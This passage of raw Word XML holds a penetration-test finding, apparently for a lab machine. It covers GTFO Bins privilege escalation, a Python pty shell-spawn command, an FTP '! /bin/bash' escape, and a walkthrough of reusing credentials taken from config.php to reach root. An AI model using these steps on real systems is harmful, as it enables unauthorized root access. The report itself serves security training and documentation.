        <w:gridCol w:w="8787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB268D" w14:paraId="55E1909A" w14:textId="77777777" w:rsidTr="00E06298">
        <w:trPr>
          <w:trHeight w:val="1403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="561512DB" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRPr="002C17A9" w:rsidRDefault="00BB268D" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01813BD8" w14:textId="6C8A0E38" w:rsidR="007D00C3" w:rsidRPr="007D00C3" w:rsidRDefault="007D00C3" w:rsidP="007D00C3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D00C3">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>The attacker leverages a collection of binaries known as "GTFO Bins." These binaries are designed for administrative tasks and may have configurations that, when manipulated, allow for privilege escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB268D" w14:paraId="24669B84" w14:textId="77777777" w:rsidTr="00E06298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49755A8F" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361FF37F" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02CD16EC" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10F50FAA" w14:textId="0ECE43DD" w:rsidR="00BB268D" w:rsidRDefault="007D00C3" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015138D" w14:paraId="73886A53" w14:textId="77777777" w:rsidTr="0015138D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B9DD3EC" w14:textId="5937166B" w:rsidR="0015138D" w:rsidRDefault="0015138D" w:rsidP="00BB268D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Bash shell command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D7D80F" w14:textId="1215780E" w:rsidR="0015138D" w:rsidRDefault="0015138D" w:rsidP="00BB268D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0015138D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">python -c 'import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0015138D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>pty;pty</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0015138D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>.spawn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015138D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F331CB" w14:paraId="02CCCE1D" w14:textId="77777777" w:rsidTr="0015138D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="771231BA" w14:textId="7716F44E" w:rsidR="00F331CB" w:rsidRDefault="00F331CB" w:rsidP="00BB268D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>FTP command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="100AA0F0" w14:textId="71CE75C6" w:rsidR="00F331CB" w:rsidRPr="0015138D" w:rsidRDefault="00F331CB" w:rsidP="00BB268D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>! /bin/bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="348A2BBA" w14:textId="6372DEFA" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E10EB6" w14:textId="1F00509D" w:rsidR="00762ED6" w:rsidRDefault="00762ED6" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovery </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Method :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55A70AAC" w14:textId="77777777" w:rsidR="00F331CB" w:rsidRPr="00F331CB" w:rsidRDefault="00F331CB" w:rsidP="00F331CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So, when I gained access to the machine, I started checking files, and I found a "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" file that contained the database username and password: "root-john123". I attempted to switch to the root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> encountered an error stating "must be run as terminal." To overcome this, I used a command to get a Bash shell, and I successfully obtained a Bash shell. When I tried to switch to the root user, I encountered an "authentication failure" error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04515A74" w14:textId="77777777" w:rsidR="00F331CB" w:rsidRPr="00F331CB" w:rsidRDefault="00F331CB" w:rsidP="00F331CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Next, I checked the "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd" file, where I found a user named "sickos." I attempted to log in using the command "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sickos" with the password "john@123," and successfully accessed the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sickos</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F331CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. My next step was to escalate privileges to the root user. I used FTP for privilege escalation, connected to FTP, ran the specified command, logged in as the root user, and found a file in the root directory. This completed my task, and finally, I had root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A215C6B" w14:textId="77777777" w:rsidR="00F331CB" w:rsidRDefault="00F331CB" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D8F99B" w14:textId="77777777" w:rsidR="00762ED6" w:rsidRDefault="00762ED6" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BC60A7" w14:textId="4131E3D5" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE28D1" w14:textId="40E48375" w:rsidR="00B802BD" w:rsidRDefault="00B802BD" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="199400B0" wp14:editId="2C07B9B4">
            <wp:extent cx="6840220" cy="38474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6840220" cy="3847465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4B797" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6793FC49" w14:textId="77777777" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334273F5" w14:textId="0AA808EF" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B6541" w14:textId="2812B36B" w:rsidR="00762ED6" w:rsidRPr="00762ED6" w:rsidRDefault="00762ED6" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mitigating these vulnerabilities involves implementing security best practices to ensure that these binaries are properly configured and secure</w:t>
      </w:r>
      <w:r w:rsidR="00670312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E3B11" w14:textId="64ACF5C2" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5CF39C" w14:textId="3AFA833C" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37896D4A" w14:textId="2E327737" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61144FD2" w14:textId="63471922" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399C1221" w14:textId="33706198" w:rsidR="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF5B8B9" w14:textId="66BC8186" w:rsidR="00BB268D" w:rsidRPr="00BB268D" w:rsidRDefault="00BB268D" w:rsidP="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A93F8E" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRPr="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102ED34D" w14:textId="11DD6792" w:rsidR="00A06F2D" w:rsidRPr="00A06F2D" w:rsidRDefault="00A06F2D" w:rsidP="007F3963">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A06F2D" w:rsidRPr="00A06F2D" w:rsidSect="007F396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634EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E8E8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02991"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9416BD56"/>
    <w:lvl w:ilvl="0" w:tplc="A63E428E">
      <w:start w:val="4"/>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EE1411"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E24C8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F44F44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E24C8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2D6F63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F80D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7B5A1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFC6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54AA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2604C4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2D44FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94D682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C15AA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E24C8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356645"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="794279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083127">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1722441549">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1855068755">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1224412370">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1613172057">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="802960652">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1945796213">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="915014825">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1495796109">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2033608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963"/>
    <w:rsid w:val="00011366"/>
    <w:rsid w:val="0003341C"/>
    <w:rsid w:val="000B1F18"/>
    <w:rsid w:val="000D628C"/>
    <w:rsid w:val="00120E30"/>
    <w:rsid w:val="00150DBF"/>
    <w:rsid w:val="0015138D"/>
    <w:rsid w:val="0017027B"/>
    <w:rsid w:val="00187030"/>
    <w:rsid w:val="001B68D9"/>
    <w:rsid w:val="001C6119"/>
    <w:rsid w:val="001D3A2A"/>
    <w:rsid w:val="00254F77"/>
    <w:rsid w:val="00290413"/>
    <w:rsid w:val="002C17A9"/>
    <w:rsid w:val="00313003"/>
    <w:rsid w:val="00366DDB"/>
    <w:rsid w:val="0036725C"/>
    <w:rsid w:val="003840D2"/>
    <w:rsid w:val="00395FE0"/>
    <w:rsid w:val="003A22A1"/>
    <w:rsid w:val="003B07CE"/>
    <w:rsid w:val="003C1B38"/>
    <w:rsid w:val="003D0B8C"/>
    <w:rsid w:val="0042579B"/>
    <w:rsid w:val="00450307"/>
    <w:rsid w:val="00452D77"/>
    <w:rsid w:val="004F173B"/>
    <w:rsid w:val="00652228"/>
    <w:rsid w:val="00661EE9"/>
    <w:rsid w:val="00670312"/>
    <w:rsid w:val="006F2192"/>
    <w:rsid w:val="00762ED6"/>
    <w:rsid w:val="007708AA"/>
    <w:rsid w:val="007A75A0"/>
    <w:rsid w:val="007D00C3"/>
    <w:rsid w:val="007F3963"/>
    <w:rsid w:val="0081006E"/>
    <w:rsid w:val="00815569"/>
    <w:rsid w:val="00857AAA"/>
    <w:rsid w:val="008A30DE"/>
    <w:rsid w:val="009060FB"/>
    <w:rsid w:val="009F0F9B"/>
    <w:rsid w:val="00A04133"/>
    <w:rsid w:val="00A06F2D"/>
    <w:rsid w:val="00A6298F"/>
